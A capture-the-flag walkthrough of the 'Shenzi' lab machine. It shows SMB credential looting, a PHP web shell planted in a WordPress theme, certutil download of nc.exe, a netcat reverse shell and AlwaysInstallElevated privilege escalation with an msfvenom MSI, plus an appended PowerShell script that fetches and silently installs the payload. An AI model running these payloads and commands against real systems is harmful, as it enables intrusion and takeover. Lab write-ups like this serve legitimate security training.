# Shenzi

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.85.55 all`

![](/files/gcuz6z9KBy2bWxo7BYMg)

### Service Enumeration

#### SMB (Port 445)

We can list the available share names.

![](/files/oexqG5BtpJOHzv3t4LoL)

We can then download all the files from the share to see if any of them are useful.

![](/files/DHvp7tUy9tevJMGF4Nf9)

`Passwords.txt` contains several sets of credentials, which we save for later.

![](/files/Nt0skmi711uZ3tlX3Gca)

Notice that one of them is a WordPress login. That points us at the web server, so we run `gobuster` against it to look for interesting directories.

#### HTTP (Port 80)

It looks like a basic XAMPP server.

![](/files/StaJhat7cxjlg714GWMB)

We can run `gobuster`.

![](/files/FAn9RL1Yj1uRlxr3z77I)

There is a `phpmyadmin` directory, but we can't access it.

After more digging and some guesswork, I tried the `/Shenzi` directory and got this page.

![](/files/FCidPziZ5PKeM6r3LepJ)

Since we know this is a WordPress site, we can try the `wp-admin/` directory under it, which gives us the login page.

![](/files/7LLcJPqu8P53LqInPRHb)

From our earlier SMB enumeration we already have the credentials `admin:FeltHeadwallWight357`. They authenticate successfully.

## Exploit

Here, we can navigate to `Theme Editor` under the `Appearance` tab, where we are able to edit the active theme's PHP files directly.

![](/files/2QKg9c1tGwKKQGy8cAc1)

We paste the source of the simple PHP web shell from <https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php> into the theme's `404.php` file and save it. WordPress renders this template whenever it serves a 404, so the web shell becomes reachable by requesting any non-existent page on the site, or by requesting the template file itself. (Note that this only works because file editing has not been disabled with `DISALLOW_FILE_EDIT` in `wp-config.php`, and it modifies a live site file, so it is noisy.)

Then we request `/404.php`, or any other path that doesn't exist, and we get our web shell.

![](/files/OXrkq46aMJ50Z5NPHaWS)

Next, let's transfer `nc.exe` to the target so we can use it to get a reverse shell. With the binary hosted on our web server, we run the following through the web shell:

`cmd.exe /c certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe`

![](/files/xEdrA6wXPr4vvb08sf3p)

![](/files/6gkWS3gzFggfDUGPryra)

![](/files/hQJ1MAoU7DYuikFKtraY)

Next, let's get a reverse shell.

With a listener waiting on port 443 on our machine, we run the following command in the PHP web shell:

`nc.exe -e cmd 192.168.49.85 443`

![](/files/I9AzeaI0bCQLTrjl02DH)

## Privesc

Next, we transfer winPEAS to the target and run it.

winPEAS shows that `AlwaysInstallElevated` is **enabled** (value **0x1**) in both registry locations, `HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer` and `HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer`. With both set, a user of any privilege level can **install** (execute) **`*.msi`** packages as NT AUTHORITY\\**SYSTEM**, because `msiexec` performs the installation with elevated rights. The policy only takes effect when both values are 1; if either is missing, the package runs as the current user.

Credits - <https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated>

![](/files/Qmf8wzM8blQUPBBe6foW)

Let's generate a `.msi` reverse shell file first.

`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.85 LPORT=21 -f msi > ~/pg/shenzi/shell.msi`

![](/files/sgL4a2Ijr7dNQIi0yIIK)

After transferring the file to the target and launching it with `msiexec`, we get a SYSTEM shell on our port 21 listener.

![](/files/fawgeNpSuGhVwoUP5Sg9)

![](/files/ePhPLfvlmQj6UZQLrqf7)
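As an added example (not part of the original writeup), the following PowerShell script, run from the reverse shell on the target, first verifies the condition winPEAS reported and only then performs the MSI step. It assumes our attacker machine serves `shell.msi` over HTTP at `http://192.168.49.85/shell.msi` and has a listener on port 21 (`nc -lvnp 21`), matching the `msfvenom` LHOST/LPORT above; the URL path, staging directory and script name are assumptions. The check matters because the policy is only honoured when `AlwaysInstallElevated` is 1 in both HKLM and HKCU; with only one of them set, `msiexec` installs the package with the current user's rights and no privilege escalation happens.

```powershell
# Added example, not code from the original writeup.
# Verifies AlwaysInstallElevated in both hives, then fetches and silently
# installs the msfvenom-built MSI so its payload runs as NT AUTHORITY\SYSTEM.
# Assumed: attacker HTTP server on 192.168.49.85 serving shell.msi, and a
# listener on 192.168.49.85:21 (nc -lvnp 21) matching the msfvenom LHOST/LPORT.
# Run from the reverse shell as:
#   powershell -ExecutionPolicy Bypass -File .\check_aie.ps1

$policyKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

function Get-AlwaysInstallElevated {
    param([string]$Hive)   # 'HKLM' or 'HKCU'
    $regPath = "${Hive}:\$policyKey"
    # A missing key or missing value counts as "not set" (0).
    $item = Get-ItemProperty -Path $regPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

$hklm = Get-AlwaysInstallElevated -Hive 'HKLM'
$hkcu = Get-AlwaysInstallElevated -Hive 'HKCU'
Write-Host "HKLM AlwaysInstallElevated = $hklm"
Write-Host "HKCU AlwaysInstallElevated = $hkcu"

# Both values must be 1; otherwise the MSI runs with our own privileges.
if ($hklm -ne 1 -or $hkcu -ne 1) {
    Write-Host 'AlwaysInstallElevated is not fully enabled; the MSI will not run as SYSTEM.'
    exit 1
}

# Stage the package in a directory every user can write to (assumed path).
$msi = Join-Path $env:TEMP 'shell.msi'
certutil.exe -urlcache -split -f 'http://192.168.49.85/shell.msi' $msi | Out-Null
if (-not (Test-Path $msi)) {
    Write-Host 'Download failed; check the attacker web server.'
    exit 1
}

# /quiet /qn suppress the installer UI, /i installs. The payload executes as a
# custom action while msiexec is running as SYSTEM. Do not wait on the process:
# the reverse shell keeps the installer open until the shell is closed.
Start-Process -FilePath 'msiexec.exe' -ArgumentList "/quiet /qn /i `"$msi`""
Write-Host 'msiexec launched; check the listener on port 21.'
```

The installation itself will report a failure or roll back once the payload's shell exits; that is expected and does not affect the SYSTEM shell already connected to the listener. Running the two registry reads before launching anything also avoids wasting the noisy `msiexec` step on a host where only one of the values is set.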
